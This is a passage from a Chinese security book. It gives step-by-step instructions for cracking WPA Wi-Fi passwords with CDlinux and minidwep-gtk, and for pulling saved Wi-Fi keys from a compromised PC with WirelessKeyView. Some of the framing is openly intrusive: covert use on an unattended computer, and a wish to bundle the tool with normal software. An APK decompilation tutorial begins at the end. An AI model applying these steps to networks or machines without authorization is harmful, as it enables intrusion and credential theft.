未知 5.1 使用CDlinux轻松破解无线网络密码 CDlinux无线破解系统基于CDlinux 0.9x系列打包,使用minileaf的spring包无线模块,加入了minidwep-gtk、feedingbottle、inflator等无线工具,下载地址为http:// cdlinux.net/forum-2-1.html,可以使用VMware、USB设备和刻录光盘进行无线密码的破解。minidwep-gtk通过抓包进行破解,破解成功率的高低取决于信号强度、密码字典等因素。当正在破解的无线路由器上有数据传输,即有用户进行连接时,配合强悍的密码字典,一般都能破解成功。 5.1.1 准备工作 使用CDlinux进行破解之前,需要完成如下准备工作。 01 制作CDlinux启动盘 下载CDlinux无线破解系统镜像文件,然后使用光盘刻录软件以镜像方式刻录光盘。 02 准备无线网卡 某些版本的CDlinux无线破解系统可能无法识别无线网卡。如果不能识别无线网卡,后续破解工作将无法开展。 03 制作密码字典 可以在互联网上下载密码字典,也可以自己生成密码字典。 5.1.2 开始破解 下面开始使用CDlinux进行破解。 01 使用CDlinux无线破解系统盘启动系统 将CDlinux无线破解系统盘插入光驱,使用光驱启动模式启动系统。启动过程可能较慢,需要耐心等待。启动完成后,按照默认设置进入即可。 02 扫描 运行minidwep-gtk,如图5-1所示,会显示无线网卡列表,在“加密方式”下拉列表中可以选择“WEP”和“WPA/WPA2”两种加密方式进行扫描,在“方式选择”设置区选择相应的选项,选择完毕后,单击“扫描”按钮,开始扫描无线设备。 图5-1 扫描设置 03 选择需要破解的无线路由器 扫描结束后,会显示获取的无线路由器,如图5-2所示,随机选择一个信号较强的无线路由设备,然后单击“启动”按钮开始抓包。在选择无线路由器时,可以通过手机查看无线网络,以选择网络信号较强的设备进行破解。 图5-2 选择需要破解的无线路由器 04 选择密码字典进行破解 在获取WPA握手包后才能进行破解,如图5-3所示,已经成功获取一个数据包。单击选中“yes”单选按钮,然后选择一个密码字典进行破解,如图5-4所示。 图5-3 获取WPA握手包 图5-4 使用字典进行破解 5.1.3 破解保存的握手包文件 破解握手包文件,步骤如下。 01 选择需要破解的握手包 在minidwep-gtk主界面单击“跑字典”按钮,软件会提示我们选择握手包文件。如图5-5所示,选择保存在本地的握手包文件00-36-76-08-96-6E_handshake.cap。 02 设置密码字典 选择握手包后,会提示我们选择密码字典。如图5-6所示,选择本地生成的密码字典文件pwd4.password。 图5-5 选择离线CAP包 图5-6 选择字典 03 选择MAC地址 如图5-7所示,在AP MAC中选择一个需要破解的MAC地址(这里主要是为了区分不同的AP。因为抓包可能有多个文件,所以需要选择MAC地址)。密码破解后会进行提示,如图5-8所示,显示“Bssid”和“WPA KEY”。 图5-7 选择破解的MAC地址 图5-8 密码破解成功 |
未知 5.2 使用WirelessKeyView轻松获取无线网络密码 无线密码的获取主要有两种方式:一种是截获无线数据包,通过分析数据包中的内容获取无线密码,典型的就是使用BT5、CDlinux、beni及Kali等进行破解;另一种是本节要介绍的无线密码截取软件,直接运行即可获取无线密码。 本节介绍的方法主要用于两个方面,分别是:使用无线网络的主人忘记密码后需要找回密码;入侵者在获取肉机(被控制计算机)后发现被控制计算机存在于无线网络中且使用了无线网络,需要获取该无线网络的密码。相对而言,第一种方法较为复杂和专业,只要在存在无线网络的地方即有可能成功破解密码,第二种方法简单实用,在攻防中均有用武之地。 5.2.1 WirelessKeyView简介 WirelessKeyView的最新版本是1.720。WirelessKeyView是Nir Sofer众多工具软件中的一员,分32位和64位两个版本。Nir Sofer的网站为http://www.nirsoft.net,该网站还提供了很多与安全相关的免费软件。WirelessKeyView的下载地址为http://www. nirsoft.net/utils/wireless_key.html,文件大小只有66KB。 5.2.2 使用WirelessKeyView获取无线网络密码 使用WirelessKeyView获取无线网络密码的步骤如下。 01 获取无线网络密码 将下载的wirelesskeyview.zip文件解压后直接运行,如图5-9所示,直接破解无线密码,如果当前环境中有多台无线路由器,则以列表方式显示全部破解结果。单击“View”菜单,可以选择以网格方式(Show Grid Lines)显示破解结果。在WirelessKeyView中,默认显示无线路由的名称、加密方式、十六进制无线密码、十进制密码、无线网卡名称及适配器的GUID。 说明 在能够检测到该无线网络的情况下,使用带有无线网卡的计算机即可接入该无线网络。此后在接入网络中进行渗透,相对容易一些。这也是网络渗透的方法之一。 02 定制显示 在“View”菜单中选择“Choose Columns”选项,在弹出的窗口中定制显示方式。例如,我们希望仅显示无线网络名称和无线网络密码,如图5-10所示,只要选中“Network Name(SSID)”和“Key(Ascii)”这两个复选框即可。 图5-9 获取无线网络的密码 图5-10 定制密码的显示选项 03 直接查看无线密码属性 在WirelessKeyView中双击获取的密码选项,即可出现如图5-11所示的密码详细属性显示窗口。可以在该窗口中直接复制属性值。 图5-11 显示无线密码的详细属性 04 保存无线网络密码 在WirelessKeyView中,最为实用的功能就是保存获取的无线网络密码。选中需要保存的无线网络密码,然后单击工具栏上的相应图标,即可将无线网络密码的6个属性值全部保存在文件中,如图5-12所示。 图5-12 保存无线密码 5.2.3 小结 下面简单总结一下无线密码的获取技巧和注意事项。 1.获知系统中是否存在无线网卡命令 在DOS提示符下执行“systeminfo”命令,即可获取系统中的所有已启用网卡的信息,被禁用网卡的信息是无法获取的。如图5-13所示,可以看到系统中有4个网卡,分别是自适应100M网卡Broadcom 440x 10/100 Integrated Controller、无线网卡Intel(R) PRO/Wireless 2200BG Network Connection,以及虚拟机网卡VMware Virtual Ethernet Adapter for VMnet1和 VMware Virtual Ethernet Adapter for VMnet8。 图5-13 获取网卡信息 2.无线网络密码获取思路 一般来说,使用无线网络的计算机大都是PC,安装的操作系统以各版本的Windows为主,没有黑客常用的3389等,因此,在获取密码时往往只能趁计算机主人不在计算机前面,且未锁定屏幕的情况下,使用远程控制软件实施完全控制,然后执行该软件获取无线网络密码。 3.遗憾 笔者一直想找到无线网络密码存放的位置,可到目前为止还没有什么突破。如果WirelessKeyView能够在DOS下运行,且能够保存密码就好了,这样就可以将其与一个正常软件绑定,只要一执行正常软件,就会自动在系统中生成一个包含无线网络密码信息的文本文件。目前,WirelessKeyView只能在图形界面中执行,不能不说是一大遗憾。 4.总结与体会 WirelessKeyView在网络攻防过程中如果利用得好,将会发挥意想不到的作用。除此之外,对于那些遗失了无线网络密码的用户来说,使用WirelessKeyView无疑是上上之选。 未知 第6章 App密码的获取与破解 手机App近几年得到了快速发展,移动App是未来各大公司争抢的重点市场。APK是指手机的应用程序包,与Windows的EXE文件类似。一些犯罪分子利用APK漏洞盗刷信用卡,实施短信等诈骗活动,更有甚者通过APK渗透公司内部网络,获取机密信息。因此,APK的安全不容忽视。 本章重点对APK的编译和反编译进行介绍,对手机图形锁的加/解密方式进行探讨,还针对某些典型的手机木马病毒进行了分析。 本章主要内容 手机APK程序编译攻略 Android手机屏幕锁解锁技术 钓鱼网站APK数据解密与分析 对一款手机木马的分析 |
“APK”是“Android Package”的缩写,即Android安装包(apk)。 APK是类似Symbian Sis或Sisx的文件格式,将APK文件直接传到Android模拟器或Android手机中运行即可安装。 APK文件和SIS文件一样,把Android SDK编译的工程打包成一个安装程序文件,格式为APK。 APK文件其实是ZIP格式,但后缀名被修改为“.apk”。 |
6.1.1 准备工作 测试环境: Windows Server 2003、Windows 7 软件环境: ApkTool、dex2jar、JD-GUI 1.ApkTool ApkTool是Google提供的apk编译工具,能够反编译和回编译apk,同时安装反编译系统apk所需要的framework-res框架,清理上次反编译的文件夹等,需要Java的支持。 |
ApkTool可以获取资源文件,提取图片文件和布局文件进行使用查看。 ApkTool的最新版本为2.03,下载地址为http://ibotpeaches.github.io/APKTool/install/、https:// bitbucket.org/iBotPeaches/ APKTool/downloads,其常用命令如下。 (1)反编译命令 该命令用于反编译apk文件,一般用法如下。 APKTool d <file.apk> <dir> “<file.apk>”表示要反编译的apk文件的路径,这里最好使用绝对路径,如“c:\MusicPlayer.apk”。 “<dir>”表示反编译后文件的存储位置,如“C:\MusicPlayer”。 |
APKTool d –f <file.apk> <dir> 这样就会强行覆盖已经存在的文件。 (2)编译apk 该命令用于编译修改好的文件,一般用法如下。 APKTool b <dir> 这里的“<dir>”就是反编译时输入的“<dir>”(如“C:\MusicPlayer”)。 输入这行命令后,如果一切正常,我们会发现C:\MusicPlayer目录下多了2个文件夹,分别是“build”和“dist”,其中分别存储着编译过程中逐个编译的文件及最终打包的apk文件。 (3)安装命令 install-framework命令用于为ApkTool安装特定的framework-res.apk文件,以便反编译一些与ROM相互依赖的apk文件。 |
2.dex2jar dex2jar是一个能操作Android的dalvik(dex)文件格式和Java的class文件的工具集合。 dex2jar可以将dex文件转换成Java的class文件,即将apk反编译成Java源码(将classes.dex转化成jar文件)。 dex2jar的下载地址为https://sourceforge.net/projects/dex2jar/,最新版本为dex2jar 2.0。 3.JD-GUI JD-GUI用于查看APK中classes.dex转化出的jar文件,即源码文件,对代码文件进行查看。 官方网站下载地址:https://github.com/java-decompiler/jd-gui/releases。 |
6.1.2 使用ApkTool反编译apk 下面讲解如何使用ApkTool反编译apk。 01 反编译APK程序文件 将下载的ApkTool安装文件解压,获取aapt.exe、APKTool.bat和APKTool.jar共3个文件,最新版本的APKTool_2.0.3.jar需要将文件重新命名为APKTool.jar,将需要反编译的APK文件放到该目录下,运行“cmd”命令,打开命令行提示窗口,定位到ApkTool的文件夹。 输入命令“APKTool.bat d -f 1.0.0.apk test”进行反编译,如图6-1所示,“1.0.0.apk”指的是要反编译的APK文件的全名,“test”为反编译后存储资源文件的目录名称,即“APKTool.bat d -f [apk文件] [输出文件夹]”。 在“test”文件夹中会生成apk反编译的各种文件,如图6-2所示。 图6-1 使用ApkTool反编译apk 图6-2 反编译后生成的文件 02 重新生成apk文件 对apk进行反编译后,可以修改其中的代码,使其符合个人的需求。 然后,输入“APKTool.bat b test”命令,重新将其进行编译。 编译完成后会在“test”文件下创建“build”和“dist”文件夹,“dist”文件夹中存放着打包后的apk文件,如图6-3和图6-4所示。 图6-3 编译apk文件 图6-4 重新生成apk文件 6.1.3 使用dex2jar反编译apk 下面讲解如何使用dex2jar反编译apk。 01 重命名并解压apk文件 将需要反编译的APK后缀名改为“.rar”或者“.zip”,解压后即可得到其中的classes.dex文件。 classes.dex是Java文件编译再通过dx工具打包而成的,将获取的classes.dex文件放到之前解压的工具dex2jar的文件夹内。 |
在其中输入“dex2jar.bat classes.dex”命令进行反编译,如图6-5所示,将classes.dex文件反编译成classes_dex2jar.jar文件。 图6-5 使用dex2jar反编译apk文件 02 使用JD-GUI程序查看源代码 使用jd-gui.exe程序打开“dex2jar”目录下生成的classes_dex2jar.jar文件,即可看到源码,效果如图6-6所示。 |
图6-6 查看Java源码 6.1.4 使用smali反编译apk smali最早的下载地址为http://code.google.com/p/smali/downloads/list,目前Google已将其下架,用户可以到https://github.com/JesusFreke/smali下载,其最新版本为2.0.5。 1.反编译apk程序 首先把baksmali-2.0.5.jar和smali-2.0.5.jar文件放到Android SDK安装路径下的“tools”文件夹里,用WinRAR解压apk,提取classes.dex文件并将其放入“tools”文件夹,然后在命令行界面打开“tools”目录,输入如下Java命令。 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.